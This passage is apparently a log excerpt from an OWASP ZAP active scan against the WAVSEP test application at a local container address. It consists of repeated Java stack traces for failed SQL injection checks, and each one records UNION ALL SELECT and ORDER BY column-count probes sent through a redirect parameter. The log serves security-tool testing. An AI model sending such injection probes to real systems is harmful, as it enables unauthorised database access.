org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680471 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680472 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680472 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680473 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680474 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680475 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680476 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680476 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680477 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 7639#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 7639# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9680478 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680479 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680480 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9680480 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 